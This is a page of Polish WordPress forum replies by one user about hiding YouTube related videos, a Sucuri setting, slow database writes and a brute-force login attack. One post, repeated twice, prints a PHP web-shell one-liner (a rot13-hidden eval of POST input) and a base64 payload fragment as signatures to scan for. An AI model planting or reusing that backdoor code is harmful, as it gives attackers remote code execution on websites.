Odpowiedź forum utworzona

Viewing 15 replies - 31 through 45 (of 54 total)
  • Thread Starter wolnemedia

    (@wolnemedia)

    @paweł
    Wiem o tym, pisałem, że YouTube to wyłączyło. Ale ten skrypt, który ktoś napisał, DZIAŁA (jak się zatrzyma film, wtedy propozycje i tak są, ale jeśli ktoś dotrwa do końca filmu, to propozycje filmowe ZNIKAJĄ).

    Jeśli nie wierzysz, że skrypt działa i NIE POKAZUJE propozycji filmowych na końcu, zerknij na ten test czystego PHP (nie musisz całego filmu oglądać, możesz przesunąć suwakiem prawie do końca):

    https://jupi-tupi.pl/1.php

    Robiłem kilka testów na różnych szablonach, z wordpressem i bez wordpressu. I takie mam wnioski:

    1. Skrypt z pliku php DZIAŁA BEZ PROBLEMÓW.

    2. Problemy są jak próbuję to zaimplementować do szablonu wordpressu. Jak użyłem starego szablonu strony, iframe się pokazywało (ale propozycje filmów nadal się pokazały, czyli nie udało mi się zainstalować skryptu jak należy). Jak użyłem nowoczesnych szablonów mobilnych to iframe nie pokazywało się bo wartość wielkości iframe ustawia się automatycznie na 0 (zero).

    Wnioski:

    Problemy są dwa:

    1. Jak sprawić by iframe z tego skryptu pokazywało się w moim szablonie?

    2. Jak zaimplementować poprawnie skrypt by współpracował z wordpressem?

    Thread Starter wolnemedia

    (@wolnemedia)

    Zrobiłem test by sprawdzić tę hipotezę. Do skryptu dopisałem znacznik „p” między „div” a „script”. Test tutaj:
    https://jupi-tupi.pl/2.php
    …i film dalej gra mimo znacznika. Czyli chyba to nie to. Chyba, że jest coś jeszcze w kodowaniu?

    Thread Starter wolnemedia

    (@wolnemedia)

    Autor skryptu zerknął na kodowanie i twierdzi, że problem bierze się stąd, że WordPress generuje znacznik „p” między „/div” a „script”. Mimo, że w edytorze html (a nie wizualnym) dodaję je tuż obok siebie, Worodpress (lub szablon?) narzuca znacznik „p”.

    Oto mail po angielsku z wyjaśnieniem:

    „I did take a quick look at your page and it seems your WordPress theme has injected some extra code in between mine. Crucially, the „script” tag is inside a „p” tag, so the script is unable to see the „iframe” tag like it needs to. Check the attached screenshot to see what I mean. To work properly, the „script” tag needs to be right next to the outermost „div” tag in the code (which I have just given the id of „playerWrapOuter” in the latest update to the code in my article). You may need to use the „text” editor rather than the visual editor in WordPress for inserting the code snippet, so that WordPress doesn’t inject any extra HTML tags inside of the snippet. If it still injects those tags even in the WordPress „text” editor, then there must be another method in WordPress that I am unaware of to get it to use the code unaltered.”

    Podesłał mi też printscreen z zaznaczonym problemem:


    https://zapodaj.net/images/88a5973d7b75e.png

    Czy wie ktoś jak ten problem rozwiązać?

    PS. A może ktoś mógłby wtyczkę na bazie tego skryptu opracować? Miałaby wielką popularność, bo wszystkie inne wtyczki do usuwania propozycji firmowych YouTube już nie działają.

    • Ta odpowiedź została zmodyfikowana 5 years, 3 months temu przez wolnemedia.
    Thread Starter wolnemedia

    (@wolnemedia)

    Tak było do 25 października, gdy wyłączyli tę opcję.

    Znalazłem skrypt, który pozwala blokować wyświetlanie propozycji filmów, ale nie wiem jak go zastosować w wordpressie. Samo wklejenie do spisu nic nie daje. Ale sam plik php działa.

    Tutaj ten skrypt:

    https://www.maxlaumeister.com/blog/static/hide-related-videos-in-youtube-embeds/embed-code.txt

    Podmienia się w dwóch miejscach końcówkę adresu filmu (w iframe i w samym skrypcie).

    Może ktoś wie jak to zaimplementować do szablonu wordpressa?

    • Ta odpowiedź została zmodyfikowana 5 years, 3 months temu przez wolnemedia.
    Thread Starter wolnemedia

    (@wolnemedia)

    Sprawdziłem inne szablony i embed w innej domenie – wszędzie występuje ten problem i nie wiem, czy to wina wordpressu, czy youtube, który mógł wyłączyć działanie opcji rel=0.

    • Ta odpowiedź została zmodyfikowana 5 years, 4 months temu przez wolnemedia.
    Thread Starter wolnemedia

    (@wolnemedia)

    Ta wtyczka niestety nie jest już dostępna. Została wycofana.

    Znalazłem inną wtyczkę, która ma opcję „If checked, related videos at the end of your videos will not be displayed” o nazwie „Lazy Load for Videos” ale jest jakiś problem, bo szablon strony czyta np. opcję wyłączenia paska odtwarzania filmu, ale nie blokuje podobnych filmów na końcu odtwarzacza.

    Tutaj ta wtyczka:
    https://pl.wordpress.org/plugins/lazy-load-for-videos/

    Zastanawiam się, czy projektant szablonu wbudował w niego jakiś skrypt „wspomagający” wyświetlanie filmów adresu https z YouTube, który blokuje możliwość modyfikowania.

    Potwierdza tę hipotezę to, że jak wkleiłem do wpisu w trybie tekstowym zwykły kod embed z YouTube z pełnym iframe, z opcją autoplay=1 i rel-0, to zadziałało ustawienie dla autoplaya ale nie zadziałało rel=0 dla blokowania propozycji filmów na końcu.

    Szablon, którego używam, to Alizee:
    https://athemes.com/theme/alizee/

    Może ktoś mógłby zerknąć na kodowanie (css) by zobaczyć, czy nie ma tam jakiegoś kodu narzucającego domyślne ustawienia odtwarzacza wideo?

    Zadałem pytanie o to na forum autora szablonu, ale nie udzielił jak dotąd odpowiedzi.

    • Ta odpowiedź została zmodyfikowana 5 years, 4 months temu przez wolnemedia.
    Forum: Wtyczki
    W odpowiedzi na: wtyczka prywatne wiadomości

    Mam taką samą potrzebę z PW dla uzytkowników.

    Front End PM to chyba tylko w wersji PRO pozwala na PW między użytkownikami. Kompletnie tej wtyczki nie rozumiem.

    Przeglądam WP-Recall, ale za Chiny nie wiem, jak to skonfigurować by działały PW.

    Może ktoś mógłby tu zrobić coś jakby instrukcję po polsku?

    • Ta odpowiedź została zmodyfikowana 5 years, 4 months temu przez wolnemedia.
    Thread Starter wolnemedia

    (@wolnemedia)

    Problem rozwiązany. Wtyczka securi, którą chwilę testowałem do ataku z atakami hackerskimi, dopisała do wp-config linijkę:

    define(’DISALLOW_FILE_EDIT’, TRUE); // Sucuri Security: Mon, 18 Apr 2016 17:59:12 +0000

    Po usunięciu jej uprawnienia wróciły.

    Thread Starter wolnemedia

    (@wolnemedia)

    Sprawa została wyjaśniona.

    Problem, który obserwują osoby zalogowane na moim portalu, związany z muleniem strony (czyli powolnym działaniem) wywołany jest atakiem brute-force. Atak na portal WM został potwierdzony dzięki wtyczce sucuri monitorującej podobne działania.

    Atak polega na próbach masowego logowania się, atakom nie są w stanie zapobiec wtyczki captcha.

    Jeśli używacie WordPressu, powinniście zainstalować wtyczkę „Sucuri Security – Auditing, Malware Scanner and Hardening” oraz przeskanować serwer w poszukiwaniu kodów:

    ?php ($www= $_POST[‚bat’]) && @preg_replace(‚/ad/e’,’@’.str_rot13(‚riny’).'($www)’, ‚add’);?

    eval(”
    „gzinflate(”
    „base64_decode(”

    jeśli tymi metodami jest coś zakodowane to według naszego źródła informacji powinno to wyglądać mniej więcej tak:
    1X39e9q40ujP3efZ/0H1yVnDlhAgTbcJJWm+
    Q5omachX0+
    RyjDHgYrDXhpC0p//7nRlJtvwBId3d9753z3MaLI1Go9HXaDQz2lh/t+
    H1vF9/Wfr9919/Yb+
    zq8YJq/BfVos1epbjsNYjc89amLj06y//WjDGo17TM4KA1Zj2ZtlY7ZQs449Wa/VtaaX0x+
    qb1pvXq9bblddvy29fr2jVX39ZMF3H9RH6X+
    0OT2lbHWPsjJqGObLdIWTpe7ZjBR+
    NoQ7Z7yHbHlo5vbF7tNc83Tw/0Aus2dyrH+
    02m3kAwP/ZnRwLRr7nBrmFZmP37HL37It+

    Na moim portalu atak raz się nasila, innym razem opada, dlatego strona po zalogowaniu może działać raz szybciej a innym razem wolniej. Nie wiadomo, czy hakerzy przełamali blokadę WM czy nie. Będzie to sprawdzane.

    W ubiegłą sobotę zarejestrowano tylko 208 prób logowań do WM (tego dnia strona chodziła błyskawicznie), wczoraj 1543, dzisiaj do 19:00 aż 3794. Ale to niewiele w porównaniu z atakiem z 30 marca i 1 kwietnia. 30 marca było 459 359 prób logowań, a 1 kwietnia 250 667.

    Nie wiadomo, kiedy uda się rozwiązać problem, ale sam fakt, że atakowane są strony oparte na WordPressie, powinien zostać nagłośniony, by osoby odpowiedzialne za bezpieczeństwo WordPressu dokonały stosownych poprawek zapobiegającym atakom.

    Thread Starter wolnemedia

    (@wolnemedia)

    Sprawa została wyjaśniona.

    Problem, który obserwują osoby zalogowane na moim portalu, związany z muleniem strony (czyli powolnym działaniem) wywołany jest atakiem brute-force. Atak na portal WM został potwierdzony dzięki wtyczce sucuri monitorującej podobne działania.

    Atak polega na próbach masowego logowania się, atakom nie są w stanie zapobiec wtyczki captcha.

    Jeśli używacie WordPressu, powinniście zainstalować wtyczkę „Sucuri Security – Auditing, Malware Scanner and Hardening” oraz przeskanować serwer w poszukiwaniu kodów:

    ?php ($www= $_POST[‚bat’]) && @preg_replace(‚/ad/e’,’@’.str_rot13(‚riny’).'($www)’, ‚add’);?

    eval(”
    „gzinflate(”
    „base64_decode(”

    jeśli tymi metodami jest coś zakodowane to według naszego źródła informacji powinno to wyglądać mniej więcej tak:
    1X39e9q40ujP3efZ/0H1yVnDlhAgTbcJJWm+
    Q5omachX0+
    RyjDHgYrDXhpC0p//7nRlJtvwBId3d9753z3MaLI1Go9HXaDQz2lh/t+
    H1vF9/Wfr9919/Yb+
    zq8YJq/BfVos1epbjsNYjc89amLj06y//WjDGo17TM4KA1Zj2ZtlY7ZQs449Wa/VtaaX0x+
    qb1pvXq9bblddvy29fr2jVX39ZMF3H9RH6X+
    0OT2lbHWPsjJqGObLdIWTpe7ZjBR+
    NoQ7Z7yHbHlo5vbF7tNc83Tw/0Aus2dyrH+
    02m3kAwP/ZnRwLRr7nBrmFZmP37HL37It+

    Na moim portalu atak raz się nasila, innym razem opada, dlatego strona po zalogowaniu może działać raz szybciej a innym razem wolniej. Nie wiadomo, czy hakerzy przełamali blokadę WM czy nie. Będzie to sprawdzane.

    W ubiegłą sobotę zarejestrowano tylko 208 prób logowań do WM (tego dnia strona chodziła błyskawicznie), wczoraj 1543, dzisiaj do 19:00 aż 3794. Ale to niewiele w porównaniu z atakiem z 30 marca i 1 kwietnia. 30 marca było 459 359 prób logowań, a 1 kwietnia 250 667.

    Nie wiadomo, kiedy uda się rozwiązać problem, ale sam fakt, że atakowane są strony oparte na WordPressie, powinien zostać nagłośniony, by osoby odpowiedzialne za bezpieczeństwo WordPressu dokonały stosownych poprawek zapobiegającym atakom.

    Thread Starter wolnemedia

    (@wolnemedia)

    Dodatkowa informacja: nie mamy Apache, lecz ngnxa. W logach ngnxa nic podejrzanego nie ma. Slowlog wykazał tylko to co było wiadome, że kilka skryptów WordPressa długo się wykonuje, jak wspomniany wp-includes/query.php:3603 (i kilka innych), ale to nie tłumaczy samego oczekiwania na zapis w Mysql, lecz długie wczytanie strony (tak myślę).

    Thread Starter wolnemedia

    (@wolnemedia)

    Do tego trzeba jeszcze dodać, że sam zapis nowych komentarzy do bazy danych dla niezalogowanych trwa ułamek sekundy, a dla zalogowanych od 5 do 30 sekund. Podobnie jest z dodawaniem nowych wpisów na portalu. Ciekaw jestem, jak ten problem został rozwiązany przez adminów tego forum, bo widzę, że zapisywanie działa dla zalogowanych ekspresowo.

    Thread Starter wolnemedia

    (@wolnemedia)

    Problem rozwiązałem, ale nie pamiętam już jak.

    Thread Starter wolnemedia

    (@wolnemedia)

    Tabelę zoptymalizowałem podobną wtyczką wp-sweep (na wszelki wypadek też rvg-optimize-database), usunęło sporo śmieci, baza schudła o 50 MB, trochę przyspieszyło, ale nie aż tak, by rozwiązać problem. Wciąż zamula dla zalogowanych i śmiga dla niezalogowanych.

    Dane o serwerze VPS:
    RAM/VSwap – 512/256 MB
    CPU – 2 Cores
    Storage – 150 GB
    Bandwidth – 2000 GB

    Obecna wielkość bazy danych: 350 MB

    Wersja PHP – najnowsza

    Najczęściej zamulający skrypt wg wtyczki query-monitor na stronie portalu i w wp-admin:
    wp-includes/query.php:3603

    Kilka innych też wykonuje się długo.

    Zastanawiam się, czy to wina skryptów WordPressu, Mysqla czy po prostu wtyczka do cachowania nie cachuje stron dla osób niezalogowanych? Używam CometCache, która według statystyk mocno odciążyła serwer, bardziej niż inne wtyczki do cachowania, jakie testowałem – nie używam W3 TotalCache bo po zainstalowaniu jej padł serwer.

    Thread Starter wolnemedia

    (@wolnemedia)

    Jako, że nie można tu edytować tytułu, a problem jest inny niż sądziłem, zamykam ten temat i otwieram nowy z precyzyjniejszym tytułem.

Viewing 15 replies - 31 through 45 (of 54 total)